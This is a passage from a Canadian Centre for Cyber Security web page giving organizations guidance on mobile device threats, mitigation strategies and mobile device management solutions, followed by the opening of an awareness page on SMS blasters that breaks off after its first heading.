Perform threat and risk assessments for mobile device use</a></li> <li><a href="#security-measures">6.5 Implement the necessary security measures</a></li> <li><a href="#before-deploying">6.6 Before deploying a mobile device solution</a></li> <li><a href="#maintain-mobile-security">6.7 Maintain mobile device security</a></li> <li><a href="#manage-lifcycle">6.8 Manage the lifecycle of mobile devices </a></li> </ul></li> <li><a href="#Mobility-management">7 Mobility management solutions</a> <ul><li><a href="#benefits-management">7.1 Benefits of mobile management tools</a></li> <li><a href="#Common-management">7.2 Common mobile device management and enterprise mobility management features</a></li> <li><a href="#Additional-capabilities">7.3 Additional mobile management solution capabilities</a></li> </ul></li> <li><a href="#CC-mobility-suite">8 Cyber Centreās mobility suite</a></li> <li><a href="#Summary">9 Summary</a></li> </ul></details></section><section><h2 class="text-info" id="intro">Introduction</h2> <p>Mobile devices such as smartphones, tablets and laptops are key components for your organization. They contain powerful computing capabilities, as well as the ability to communicate wirelessly. Although mobile devices enable collaboration and boost productivity and efficiency, they can also increase the risk of a compromise to your organizationās sensitive information. Your organization should implement security controls and safeguards before mobile devices are allowed to access the organizationās network.</p> <p>This publication offers guidance to help your organization understand the security threats and risks associated with mobile devices. It also provides mitigation strategies and mobile management solutions you can implement to minimize the impact on your organization.</p> </section><section><h2 class="text-info" id="EM-buisness">Enterprise mobility business drivers</h2> <p>Mobile devices have become an integral part of most organizations’ business operations. They offer employees flexibility, help improve productivity, and allow for quicker collaboration for decision-making. Employees require access to the latest technologies to perform their tasks and help them reach their goals. Organizations use mobile devices for the following reasons:</p> <ul><li><strong>Ease of use</strong>: Mobile devices have user-friendly interfaces that can be customized to meet employee and organization needs</li> <li><strong>Anytime, anywhere connectivity:</strong> Employees can remotely access business data, enterprise services and applications. This is especially important for employees who travel frequently, work at various sites, or have a patrol or delivery route.</li> <li><strong>Customization:</strong> Organizations can customize device settings to improve convenience and flexibility for employees</li> <li><strong>Cloud computing:</strong> Many organizations use cloud-based infrastructures to deliver services</li> <li><strong>Cost:</strong> Using mobile devices and service providers can lower program costs and reduce technical obsolescence issues</li> </ul></section><section><h2 class="text-info" id="EM-overview">Enterprise mobility overview</h2> <p>Enterprise mobility allows mobile devices such as smartphones, tablets and laptops to access your organizationās networks and services through commercial cellular networks and Wi-Fi. The basic segments of the enterprise mobility architecture consist of mobile devices, wireless communication networks, enterprise infrastructure, and services and applications. If your organization chooses to include mobile devices as part of your enterprise architecture, ensure you understand the related risks.</p> <h3 id="Mobile">3.1 Mobile devices</h3> <p>Mobile devices are widely available, cost effective and contain updated features and technology for communications and application functionality. Mobile device features are constantly changing and allow users to:</p> <ul><li>connect to wireless networks for voice and data communications</li> <li>store information</li> <li>access global positioning systems (GPS)</li> <li>use digital video cameras</li> </ul><h3 id="Wireless-comms">3.2 Wireless communication networks</h3> <p>There are 3 major types of wireless communication networks:</p> <ul><li>cellular networks, which are managed by commercial carriers and provide coverage by dividing a large geographical service area into smaller areas</li> <li>Wi-Fi networks, which businesses or consumers can establish to provide a networking service within a limited geographic area, such as a home, office or place of business</li> <li>other wireless networks, some of which may not conform to the Wi-Fi standard; for example, Bluetooth is often used to connect to nearby devices, such as headsets or keyboards</li> </ul><h3 id="Enterprise-infra">3.3 Enterprise infrastructure</h3> <p>The enterprise infrastructure provides the hardware, software, network resources and services required to create, operate and manage an enterprise <abbr title="information technology">IT</abbr> environment. This infrastructure enables your organization to deliver <abbr title="information technology">IT</abbr> solutions and services to employees, partners and clients. Your organizationās enterprise infrastructure may also host mobility-specific applications or allow your systems to interact with other mobile devices. The enterprise mobility capability helps secure and manage interactions between your organizationās enterprise services and authorized devices and users, ensuring a seamless and protected experience.</p> <h3 id="Services-app">3.4 Service and applications</h3> <p>These are the existing and evolving services provided for all enterprise users, including mobile users. This may include unified communications such as data (for example, email and chat), voice (for example, telephone and teleconferencing), and applications or web interfaces.</p> </section><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <p><span class="clearfix">Ā </span></p> <section><h2 class="text-info" id="Mobile-security-vul">4 Mobile device security vulnerabilities</h2> <p>The use of mobile devices, wireless networks, and voice and data services exposes organizations to a range of threats. These threats include deliberate actions by threat actors or accidental actions by authorized users. For example, threat actors might focus on a specific enterprise with the goal of compromising its clients. Organizations must also consider phishing attacks, ransomware incidents, unauthorized data access and network vulnerabilities. These risks must be addressed and sufficiently mitigated to achieve acceptable risk levels. Lastly, loss or theft of mobile devices can also create security risks for your organization, as threat actors can compromise the device and gain access to your systems and data.</p> <p>There are various mitigation strategies to address these threats, and most of them work together. In particular, the enterprise mobility infrastructure and existing enterprise capabilities can provide strong security features to protect mobile devices and employee communications.</p> <p>Mobile devices are generally at higher risk of exposure than devices that are used only within an organizationās facilities, on an organizationās networks. Therefore, they often need additional protection. You should be aware of the following major security vulnerabilities when using mobile devices:</p> <ul><li>lack of physical security controls</li> <li>untrusted mobile devices</li> <li>untrusted networks</li> <li>untrusted applications</li> <li>interaction with other systems</li> <li>untrusted content</li> <li>location services</li> </ul><h3 id="Vulnerability-exploit">4.1 How threat actors exploit these vulnerabilities</h3> <p>Some threats are intended to compromise the mobile device itself, while others are intended to ultimately infiltrate and compromise the enterprise. Some of the main threats that threat actors exploit on mobile devices include:</p> <ul><li>identifying, targeting and delivering malware to the device</li> <li>using the network connections of the device (cellular, Wi-Fi, Bluetooth) for nefarious purposes, such as exploiting flaws to compromise the device or to track its location</li> <li>using the device to infiltrate other organizational networks</li> <li>accessing the device to track location through <abbr title="global positioning systems">GPS</abbr> and other location services</li> <li>activating the microphone or camera to access data</li> <li>intercepting voice and data communications to exfiltrate sensitive data</li> <li>using third-party software to gain access to device features</li> <li>modifying the device, including changing its hardware or software remotely, by physically accessing the device or by intervening in the supply chain process</li> <li>exploiting software flaws in operating systems (OS) and applications to exploit</li> </ul></section><section><h2 class="text-info" id="Threat-risks">5 Threats and risks to the enterprise</h2> <p>Mobile devices have become integral to business operations. However, this increased dependency on mobile technology comes with a spectrum of challenges that organizations must proactively address, including data breaches, unauthorized access, and the persistent threat of malware and phishing attacks. The following examples illustrate some of these challenges.</p> <h3 id="Credential-authentification">5.1 Loss of authentication credentials</h3> <p>The loss of authentication credentials, such as passwords, tokens or private keys for certificates, presents opportunities for unauthorized access to sensitive systems, applications and data. Unauthorized access can lead to data breaches, the compromise of confidential information, and the potential misuse of corporate resources. We recommend you implement phishing-resistant multi-factor authentication (MFA) and educate your users on cyber hygiene principles such as password management.</p> <p>For more information, read <a href="/en/guidance/password-managers-security-itsap30025">Password managers: Security tips (ITSAP.30.025)</a>.</p> <h3 id="Improper-disposal">5.2 Improper disposal of old mobile devices with sensitive configurations and data</h3> <p>Access to sensitive configurations by unauthorized individuals can pose a significant risk, including potential unauthorized data access and breaches. Residual data on devices that are not wiped properly poses an ongoing threat, even after the devices have been disposed of. Non-compliance with privacy regulations may result in legal consequences, fines and reputational damage.</p> <p>For more information, read <a href="/en/guidance/sanitization-and-disposal-electronic-devices-itsap40006">Sanitization and disposal of electronic devices (ITSP.40.006)</a> and <a href="/en/guidance/it-media-sanitization-itsp40006"><abbr title="information technology">IT</abbr> media sanitization (ITSP.40.006)</a>.</p> <h3 id="Improper-social">5.3 Improper use of social media applications</h3> <p>Threat actors can exploit security vulnerabilities within social media applications installed on corporate mobile devices. If the applications contain vulnerabilities, most often from poorly written code, threat actors can leverage them to access corporate data storage. Social media applications conduct data mining to understand and predict human behaviour and if installed on corporate devices or networks, they can collect data about your organization, including contact lists or aspects of the corporate network. We recommend implementing corporate control over the applicationsā permissions and using mobile device management (MDM) restrictions.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <h3 id="Exploit-devices">5.4 Exploitation of lost or stolen devices</h3> <p>Threat actors may exploit lost or stolen devices to try and gain entry to the enterprise infrastructure or to pose as an authorized user. Identity masquerading is a significant threat and could lead to the exploitation of enterprise resources, operational disruptions and the compromise of confidential business information.</p> <h3 id="Tracking-behaviour">5.5 Threat actors tracking employee behaviour</h3> <p>Threat actors may observe employee behaviour through compromised devices in order to violate privacy and gather personal information, which can subsequently be used for entrapment or blackmail. This type of intrusion can damage the affected employeeās personal and professional life and contribute to broader consequences for the organizationās reputation and workplace trust.</p> <p>For more information, read <a href="/en/guidance/social-engineering-itsap00166">Social engineering (ITSAP.00.166)</a> and <a href="/en/guidance/digital-footprint-itsap00133">Digital footprint (ITSAP.00.133)</a>.</p> <h3 id="priviledge-misuse">5.6 Authorized equipment users attempting to misuse their privileges</h3> <p>If employees fail to adhere to security policies, it can increase vulnerabilities and the potential for data breaches. It may also compromise the integrity of devices rendering them more susceptible to security threats. Employees may misuse their privileges by attempting to access unauthorized services or applications, or by connecting directly to commercial platforms that are not permitted.</p> <h3 id="untrust-app">5.7 Untrusted app stores</h3> <p>The primary risk posed by applications downloaded from untrusted app stores is the potential compromise of a deviceās security and user data caused by malware. Applications can be repackaged to include malware without the user realizing. The user may unknowingly expose themself to harmful activities such as sensitive data exposure ,or unauthorized surveillance. This can lead to identity theft, financial losses, and significant privacy breaches for both the user and the organization.</p> </section><section><h2 class="text-info" id="Migitation-strat">6 Mitigation strategies</h2> <p>To protect sensitive information and networks, organizations should implement a defence-in-depth strategy. This includes placing multiple layers of security throughout an <abbr title="information technology">IT</abbr> system to provide redundancy if a security control fails or a vulnerability is exploited. A defence-in-depth strategy has 3 layers that focus on 3 key elements: people, technology and operations.</p> <p>As part of a defence-in-depth strategy, the following section provides additional advice on <abbr title="mobile device management">MDM</abbr> and mitigation actions your organization can take to better secure mobile devices.</p> <h3 id="mobile-security-policy">6.1 Implement a mobile device security policy</h3> <p>A mobile device security policy should define what resources can be accessed via mobile devices, the degree of access granted to mobile devices, and what types of mobile devices are permitted to access organization resources (for example, organization-issued devices versus personal devices). The policy should also cover how <abbr title="mobile device management">MDM</abbr> servers are administered, how policies in <abbr title="mobile device management">MDM</abbr> servers are updated and all other requirements for <abbr title="mobile device management">MDM</abbr> technologies. The mobile device security policy should be documented in the departmental security plan.</p> <h3 id="policy-byod">6.2 Implement a policy and user agreements for bring-your-own-device deployments</h3> <p>The bring-your-own-device (BYOD) policy should clearly define your organizationās authorities granted under legislation, regulation and user agreements to manage, monitor and respond to threats arising from personally owned mobile devices. Key considerations should include:</p> <ul><li>addressing the impact of monitoring capabilities on privacy risks</li> <li>outlining response strategies based on deployment models</li> <li>defining the organizationās authorities in triaging and responding to security incidents on personal devices</li> </ul><p>The goal is to establish a robust operational framework to effectively mitigate security risks in <abbr title="bring-your-own-device">BYOD</abbr> environments. Your organization should consider mitigation actions such as segregating guest and <abbr title="bring-your-own-device">BYOD</abbr> Wi-Fi networks from your corporate Wi-Fi network. To determine if implementing a <abbr title="bring-your-own-device">BYOD</abbr> deployment model is suitable for your organization, consult the <a href="/en/guidance/end-user-device-security-bring-your-own-device-byod-deployment-models-itsm70003">End user device security for Bring-Your-Own-Device (BYOD) deployment models (ITSM.70.003)</a> publication.</p> <h3 id="employee-training">6.3 Establish and implement employee training and awareness programs</h3> <p>Information security is the responsibility of everyone in the organization. Your organization should clearly define, communicate and support employee responsibility with effective education and awareness. Opening a single malicious email attachment or accessing just a single malicious website can compromise an entire network. Employee diligence is an important factor for business continuity in the face of todayās cyber threats. It is essential that senior management actively endorse and advance awareness initiatives, integrating them into the organizationās strategic framework.</p> <h3 id="risk-assessments-mobile">6.4 Perform threat and risk assessments for mobile device use</h3> <p>Mobile devices often need additional protection because their mobile nature exposes them to more threats than other devices. Before designing and deploying mobile device solutions, organizations should perform threat and risk assessments (TRAs). TRAs assist organizations in determining security requirements and in developing mobile device solutions that incorporate appropriate security controls.</p> <p>In a TRA, you should:</p> <ul><li>identify resources of interest, vulnerabilities and security controls related to these resources</li> <li>quantify the most likely threats and their likelihood of a successful attack and their impacts</li> <li>analyze this information to determine where security controls should be improved or added</li> </ul><p>Factors like international travel can impact TRAs. Organizations should consider the risks associated with using mobile devices abroad. Specific risk assessments for individual travel or foreign telework agreements are covered in the Cyber Centreās publication <a href="/en/guidance/device-security-travel-and-telework-abroad-itsap00188">Device security for travel and telework abroad (ITSAP.00.188)</a>. Additionally, <a href="/en/guidance/mobile-device-guidance-high-profile-travellers-itsap-00088">Mobile device guidance for high-profile travellers (ITSAP.00.088)</a> outlines common threats and security measures to safeguard mobile devices before, during and after travel.</p> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <h3 id="security-measures">6.5 Implement the necessary security measures</h3> <p>Organizations should consider the merits of each security measure, determine which controls are needed, and then implement the solutions that provide the necessary security posture. Organizations should consider the following security measures:</p> <ul><li>Enforcing departmental security policies on mobile devices, such as restricting access to hardware and software, managing wireless network interfaces, and automatically monitoring, detecting and reporting policy violations</li> <li>Supporting strongly encrypted data communications and data storage</li> <li>Securely wiping a device before reissuing it and remotely wiping a device if it is lost or stolen</li> <li>Requiring device authentication before allowing the mobile device to access departmental resources</li> <li>Restricting which third-party applications can be installed on mobile devices</li> <li>Determining the permissions assigned to each application and verifying digital signatures on applications</li> <li>Detecting and documenting anomalies within the mobile device infrastructure, including unauthorized configuration changes to mobile devices</li> </ul><p>Once an application has collected data, that data is no longer under enterprise control. Users should not trust claims of data āanonymizationā by application developers. Relying on app store vetting alone is insufficient to ensure that an app will not compromise data. App stores primarily scan for overt malware and may allow behind-the-scenes data collection activities for advertising or analytics.</p> <h3 id="before-deploying">6.6 Before deploying a mobile device solution</h3> <p>Before establishing a mobile device solution organizations should evaluate the following security aspects of the environment accounting for each type of mobile device that the organization intends to use:</p> <ul><li>connectivity</li> <li>protection</li> <li>authentication</li> <li>application functionality</li> <li>solution management</li> <li>logging</li> <li>performance</li> </ul><p>All components of the system should be updated with the latest patches and configured in accordance with sound security practices. Secure organization-issued mobile devices before allowing user access.</p> <p>Ensuring that every device is fully secured prior to granting user access establishes a foundational level of trust in the device before it encounters potential security threats. Any previously deployed organization-issued mobile devices with unknown security profiles should be fully secured to a known good state using <abbr title="mobile device management">MDM</abbr> technologies. Organizations should also deploy supplemental security controls, such as anti-virus software and data-loss prevention (DLP) technologies.</p> <h3 id="maintain-mobile-security">6.7 Maintain mobile device security</h3> <p>Organizations should implement the following processes for maintaining mobile device security:</p> <ul><li>Regularly installing upgrades and patches to enhance device protection</li> <li>Adjusting access control settings as needed to maintain security standards</li> <li>Maintaining an up-to-date inventory detailing each mobile device, its assigned user and installed applications</li> <li>Revoking access to or deleting applications that have been assessed as too risky</li> <li>Safeguarding sensitive data by sanitizing mobile devices before issuing them for reuse</li> <li>Implementing an incident response plan that details how to address high-risk and compromised devices</li> </ul><p>Organizations should perform audits periodically to ensure that their mobile device policies, processes and procedures are being followed properly.</p> <p>Organizations with more mature <abbr title="information technology">IT</abbr> infrastructure and business processes should choose a mobility management solution that enables enhanced business features, such as mobile access to corporate email, calendars, contact lists and other corporate applications, to integrate seamlessly with corporate authentication mechanisms. The mobility management solution should also maintain the security of the mobility enterprise. There are different mobile management solutions with distinct capabilities. In industry, these solutions are referred to as <abbr title="mobile device management">MDM</abbr>, enterprise mobility management (EMM) and unified endpoint management (UEM).</p> <a href="#Mobility-management">Section 7 Mobility management solutions</a> will provide an overview of the different categories of mobility management solutions, as well as strategies to help you choose the solution that best suits your organizationās needs. <h3 id="manage-lifcycle">6.8 Manage the lifecycle of mobile devices</h3> <p>Your organization should ensure you have a process for identifying mobile device vendors that provide procedures and solutions to manage end-of-life (EoL) devices. For laptops, this can also include EoL for operating systems. You should also ensure that your vendors adhere to supply chain integrity (SCI) risk assessments, which should be conducted prior to procuring devices.</p> <p>Ensure you have procedures in place to lifecycle of <abbr title="end-of-life">EoL</abbr> devices, to properly sanitize the device once recovered from the user, and to dispose of the device in a secure manner. For more information on device sanitization and destruction, read <a href="/en/guidance/sanitization-and-disposal-electronic-devices-itsap40006">Sanitization and disposal of electronic devices (ITSAP.40.006)</a>.</p> </section><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="Mobility-management">7 Mobility management solutions</h2> <p>Mobile devices have become essential for many organizations, enabling more efficient execution of business activities. With greater amounts of sensitive data now passing through endpoints and being exchanged between mobile devices, information sharing has reached unprecedented levels. If mobile devices are not managed properly, they can put your organization’s data and network security at risk. Proactively managing these devices across all business operations and implementing a strong mobility management solution is critical to protect your organization from potential data breaches.</p> <p>Managing mobile devices is a unified approach that encompasses various categories of mobile management solutions, referred to in industry as <abbr title="mobile device management">MDM</abbr>, EMM, and UEM. Mobile management solutions apply software, processes and security policies to mobile devices in their usage. Understanding the different features offered by various mobile management solutions will help you choose the best solution for your organization.</p> <p>There is little difference between <abbr title="mobile device management">MDM</abbr> and EMM, and the 2 terms are often used interchangeably. <abbr title="mobile device management">MDM</abbr> focuses on fundamental tasks such as:</p> <ul><li>enrolling and configuring devices</li> <li>managing credentials</li> <li>enforcing password and functionality restrictions</li> <li>managing <abbr title="bring-your-own-device">BYOD</abbr> profiles</li> <li>facilitating device management and support functions, such as inventory audits, password resets and remote wipes</li> </ul><p>EMM encompasses all <abbr title="mobile device management">MDM</abbr> functionalities, with additional advanced features such as:</p> <ul><li>more sophisticated containerization</li> <li>management of corporate credentials and authentication mechanisms</li> <li>advanced mobile application management</li> <li>integration with other enterprise platforms</li> </ul><p>EMM also extends <abbr title="mobile device management">MDM</abbr> capabilities through features like mobile application management and mobile threat response applications.</p> <p>UEM is a unified holistic mobile management solution that encompasses <abbr title="mobile device management">MDM</abbr>, EMM and other mobile management capabilities to address security concerns related to managing corporate data while increasing connectivity and productivity. While <abbr title="mobile device management">MDM</abbr> and EMM solutions are dedicated to managing mobile devices, UEM allows organizations to distribute, manage, control and track other endpoint devices in the workplace, such as personal computers, tablets, Internet of Things (IoT) devices, printers and wearables.</p> <p>We encourage organizations to conduct a security threat assessment using a framework like <a href="/en/guidance/cyber-security-privacy-risk-management">Cyber security and privacy risk management series: A lifecycle approach (ITSP.10.033)</a> to determine their security requirements and acceptable level of risk, rather than focusing on terms. A threat assessment will also help identify the technical security controls required to address these threat areas, which will help organizations choose a mobility management solution.</p> <p>Identifying and implementing a narrower set of technical controls, along with other security controls and policies as per <a href="/en/guidance/cyber-security-privacy-risk-management">Cyber security and privacy risk management: A lifecycle approach</a>, can help organizations mitigate risks while balancing the user experience, flexibility and functionality promised by mobile devices. Once implemented, test and adjust the controls periodically to ensure that they are functional and providing adequate security.</p> <h3 id="benefits-management">7.1 Benefits of mobile management tools</h3> <p>Mobile management tools can secure, monitor, manage and support mobile devices such as smartphones and tablets that run on multiple platforms and are deployed within a network. These tools control and protect data and configuration settings. With these tools, your <abbr title="information technology">IT</abbr> administrator can configure devices according to employee job requirements and install the applications needed for work purposes.</p> <p>A wide range of mobile management tools are available, from basic solutions that control a mobile deviceās security settings to more advanced solutions that extend and enforce a mobile deviceās security policies and controls and provide seamless integration with your organizationās systems and services.</p> <p>An optimal mobile management solution must consider the productās capabilities and the mobile device platforms, as well as security feature capabilities and support. Consider the type of mobile devices your organization uses before choosing a mobile management solution.</p> <p>Do not rely on an <abbr title="mobile device management">MDM</abbr> solution to make up for poor mobile device security. <abbr title="mobile device management">MDM</abbr> tools cannot add missing security features to a platform or device; they can only use the security features and controls that a mobile device platform supports natively.</p> <p>Your organization should choose the solution that best suits its business and security needs by considering the following:</p> <ul><li>level of control needed depending on the sensitivity of the data being handled</li> <li>budget available for specific deployment models (for example, hardware supply or <abbr title="information technology">IT</abbr> support)</li> <li>best balance between business and personal use</li> </ul><p>It is important for your organization to train employees on privacy and security best practices to ensure devices are used safely with the deployment model your organization selects.</p> <p>In addition to the mitigation strategies provided in this publication, you can reference the <a href="https://www.cisa.gov/sites/default/files/publications/CEG_Mobile_Device_Cybersecurity_Checklist_for_Organizations_0.pdf">Mobile Device Cybersecurity Checklist for Organizations (PDF)</a> developed by the Cybersecurity and Infrastructure Security Agency (CISA). This checklist provides best practices to help organizations protect their mobile enterprise by mitigating security vulnerabilities and ensuring secure mobile access to enterprise resources.</p> <h3 id="Common-management">7.2 Common mobile device management and enterprise mobility management features</h3> <p><abbr title="mobile device management">MDM</abbr> and EMM solutions offer many features to address mobile device security, compliance and operational efficiency. Some common features include:</p> <ul><li>mobile device management <ul><li>deploy and enroll</li> <li>provision devicesādevice settings, restrictions, credentials</li> <li>control devicesāaudit devices, reset passwords, remote wipe</li> <li>manage applicationsācontrol what applications can be loaded and used</li> <li>track inventory</li> </ul></li> <li>mobile device security <ul><li>enforce security policies, real-time monitoring and reporting</li> <li>enforce strong passwords for mobile device access</li> <li>prevent unauthorized device access using a remote lock</li> <li>perform remote wiping if device is stolen or lost</li> <li>protect device from unsecured Wi-Fi and Bluetooth connections</li> </ul></li> <li>facilitation of corporate data security <ul><li>mandate data encryption for both data-in-transit and data-at-rest</li> <li>enforce the use of virtual private network (VPN) connection between the mobile device and the organizationās server</li> <li>automatically back up essential data from the device to the main server</li> </ul></li> <li>messaging and email integrationāfully integrate and support all major features (calendar, contacts, support for all major platforms)</li> <li>enterprise enablersāprovide support, access and control for intranet and corporate web services and applications</li> </ul><h3 id="Additional-capabilities">7.3 Additional mobile management solution capabilities</h3> <p>Larger organizations that have complex mobile device infrastructures and require a more comprehensive solution can consider some of the following additional capabilities that certain mobile management tools offer.</p> <h4>7.3.1 Mobile application management</h4> <p>Mobile application management (MAM) involves deploying, managing and controlling specific business applications on <abbr title="bring-your-own-device">BYOD</abbr> and company-owned/personally enabled (COPE) devices. MAM allows organizations to segregate personal and business applications, and to create a personalized enterprise application store. With MAM, administrators can push, install, patch and update mobile business applications as required, and configure the applications to comply with specific policies. MAM also supports inventory management, application lifecycle management and software licensing management.</p> <h4>7.3.2 Mobile content management</h4> <p>Mobile content management (MCM) is a security tool that manages content access on mobile devices. It allows employees to access, distribute and store work-related files, information and data without compromising security or the end-user experience. It offers ease of collaboration across secured networks and <abbr title="mobile device management">MDM</abbr>-registered devices. <abbr title="Mobile content management">MCM</abbr> enables the administrator to restrict access rights to each employee and to allows only approved applications to access and distribute data.</p> <h4>7.3.3 Mobile identity and access management</h4> <p>This process manages and defines roles and privileges for each user to ensure that access to organizational resources is restricted to those with access rights. It relies on <abbr title="multi-factor authentication">MFA</abbr>, biometrics, certificates, code signatures or device-specific information to control how employees use the organizationās applications and data.</p> <h4>7.3.4 Mobile threat management</h4> <p>Mobile threat management (MTM) is a mobile security product that helps organizations reduce the risk posed by mobile devices. The premise of <abbr title="Mobile threat management">MTM</abbr> is that although device manufacturers are improving the security posture of their devices with every release, vulnerabilities remain, and new ones are continually discovered.</p> <p><abbr title="Mobile threat management">MTM</abbr> attempts to help organizations manage risk by implementing functions such as:</p> <ul><li>integration with <abbr title="mobile device management">MDM</abbr>/EMM functions, such as enrollment, security policy and restrictions, and audit/logging</li> <li>application and <abbr title="operating systems">OS</abbr> version and patch management</li> <li>enforcement and automation of domain name system (DNS) filtering and VPN use</li> <li>installed application inventory, malware detection, and allow list and deny list</li> <li>mobile incident responseāthis pairs well with UEM platforms, where compliance-based controls are often used for automated responses to mobile security incidents</li> </ul><h4>7.3.5 Mobile expense management</h4> <p>Mobile expense management (MEM) allows organizations to track and control expenses across their entire mobility infrastructure. It also allows organizations to set limits for data and application usage.</p> <h4>7.3.6 Containerization</h4> <p>Containerization is a data segregation solution for devices that store both work and personal data such as <abbr title="bring-your-own-device">BYOD</abbr> and COPE. It isolates your organizationās data from everything else on the device, in separate encrypted containers.</p> </section><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> <section><h2 class="text-info" id="CC-mobility-suite">8 Cyber Centreās mobility suite</h2> <p>To help mitigate the threats posed by mobile devices, the Cyber Centre has created a suite of mobile security publications that can help organizations significantly reduce their threat surface with respect to mobile devices. In addition to the publications mentioned earlier in this publication, the following resources may also be of value to your organization:</p> <ul><li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="38a1fb42-00d7-4f06-89ad-c73fa0e72ce9" href="/en/guidance/using-your-mobile-device-securely-itsap00001">Using your mobile device securely (ITSAP.00.001)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="7aa3f54a-1d31-4a82-aa41-93dec6e4dc73" href="/en/guidance/security-considerations-mobile-device-deployments-itsap70002">Security considerations for mobile device deployments (ITSAP.70.002)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="c9cbfaae-471a-4c9b-a691-67c9f13eb776" href="/en/guidance/mobile-devices-and-business-travellers-itsap00087">Mobile devices and business travellers (ITSAP.00.087)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="639ede31-0d64-45cb-9688-664b3ee445cb" href="/en/guidance/how-updates-secure-your-device-itsap10096">How updates secure your device (ITSAP.10.096)</a></li> <li><a data-entity-substitution="canonical" data-entity-type="node" data-entity-uuid="4e3fdb7e-a4e6-4823-8828-4cb10673f867" href="/en/guidance/cyber-security-considerations-5g-networks-itsap80116">Cyber security considerations for 5G networks (ITSAP.80.116) </a></li> </ul></section><section><h2 class="text-info" id="Summary">Summary</h2> <p>Mobile devices are convenient, flexible and allow employees to work anywhere and at any time. However, their complex design and enhanced functionality can pose a threat to your organizationās information, assets and networks. Since mobile devices can contain, or provide access to, vast amounts of sensitive corporate and personal information, they are attractive targets that can provide unique opportunities for threat actors intent on gathering information.</p> <p>The threats posed by mobile device use are numerous and must be clearly understood and mitigated to protect the confidentiality, availability and integrity of your organizationās information. Enterprise mobility should use commercially available protections and compensate for device limitations within the overall enterprise mobility architecture, leverage the organizationās risk-management framework, and develop security policies specifically for mobile devices.</p> <p>Where necessary, you can further harden commercial mobile devices to improve integrity and reduce risks. Your organization should conduct a threat and risk assessment to determine the security controls for its enterprise mobility solutions. Security controls need to be implemented and verified for the organizationās complete information system, from mobile devices to the network services that support business processes and information assets.</p> <p>The Cyber Centre encourages organizations with more mature <abbr title="information technology">IT</abbr> infrastructures and business processes to implement a mobility management solution that enables enhanced business and security features, as well as improved capabilities to secure, manage, audit and support mobile devices in the workplace.</p> </section><!– Forward and details –><section><h3>Effective date</h3> <p>This publication takes effect on May 4, 2026.</p> <p>This is an unclassified publication issued under the authority of the Head of the Cyber Centre.</p> <p>This document supersedes:</p> <ul><li>Securing the enterprise for mobility (ITSM.80.001), July 2016</li> <li>Mobile device management (MDM) solutionsĀ – guidance for the Government of Canada (ITSB-64), July 2013</li> <li>Mobile securityĀ – Securing the Government of Canada (ITSE.80.001), June 2016</li> </ul><h3>Revision history</h3> <ol class="lst-spcd"><li>First release: July, 2016</li> <li>Second release: May, 2026</li> </ol></section><div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp" title="Return to Top of page">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </div> </div> </div> </div> </div> </div> </div> </article>
- Protect your devices from SMS blasters (ITSAP.00.104)by Canadian Centre for Cyber Security on May 1, 2026 at 7:00 pm
<article data-history-node-id="7625" about="/en/guidance/protect-your-devices-sms-blasters-itsap00104" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"> <div class="col-md-4 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>May 2026</strong></p> </div> <div class="col-md-4 hidden-xs hidden-sm"> <p class="text-center"><strong>Awareness series</strong></p> </div> <div class="col-md-4 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSAP.00.104</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>May 2026Ā |Ā Awareness series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"><!–<div class="mrgn-bttm-md well well-sm col-md-4 pull-right mrgn-lft-md col-sm-12 col-xs-12"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/itsap00104-e.pdf">Protect your devices from <abbr title="short message service">SMS</abbr> blasters - ITSAP.00.104 (PDF, # KB)</a></p> </div>–> <p>Text messages (<abbr title="short message service">SMS</abbr>) have become one of the most common ways for threat actors to try and scam victims. <abbr title="short message service">SMS</abbr> blasters are a type of cell site simulator, which are portable devices that impersonate legitimate mobile networks to trick nearby devices to connect to them. Threat actors use <abbr title="short message service">SMS</abbr> blasters to carry out <abbr title="short message service">SMS</abbr> phishing attacks (known as smishing) and other malicious activities designed to steal sensitive or financial information or spread disinformation. This publication offers information on the threats posed by <abbr title="short message service">SMS</abbr> blasters and how to best protect yourself.</p> <section><h2 class="text-info h3">On this page</h2> <ul><li><a href="#1">How <abbr title="short message service">SMS</abbr> blasters work</a></li> <li><a href="#2">Threats posed by <abbr title="short message service">SMS</abbr> blasters</a></li> <li><a href="#3">How to protect against <abbr title="short message service">SMS</abbr> blasters</a></li> <li><a href="#4">Learn more</a></li> </ul></section></div> </div> <h2 class="text-info" id="1">How <abbr title="short message service">SMS</abbr> blasters work</h2> 